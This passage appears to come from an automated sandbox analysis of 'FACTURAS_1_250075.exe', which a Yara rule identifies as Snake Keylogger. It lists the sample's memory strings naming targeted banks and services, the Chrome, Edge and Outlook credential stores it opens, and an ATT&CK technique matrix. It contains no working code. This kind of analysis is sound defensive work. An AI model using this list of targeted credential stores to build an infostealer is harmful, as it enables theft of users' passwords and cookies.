          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003613B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Fc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEqGLI7p5uhNqNCFVrNtQc12HMs0vzinLZc%2FKJbV1jTA%2FzrKnjitar9hXMUGl0dWCYEK0eFc78BMwZRFP1QEMulqXXlhJ%2Fl6vF3iXt5iDycStZ%2BXTjh2r3XVcsKbLpt1HAu7qxFV"}],"group":"cf-nel","max_age":604800}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000373BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI call chain: ExitProcess graph end nodegraph_0-4662
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeAPI call chain: ExitProcess graph end nodegraph_0-4669
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Users\user\Desktop\FACTURAS_1_250075.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: FACTURAS_1_250075.exe PID: 2932, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		11
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory31
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Application Window Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		3
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Access Token Manipulation          		NTDS1
          System Network Configuration Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Process Injection          		LSA Secrets3
          File and Directory Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials215
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.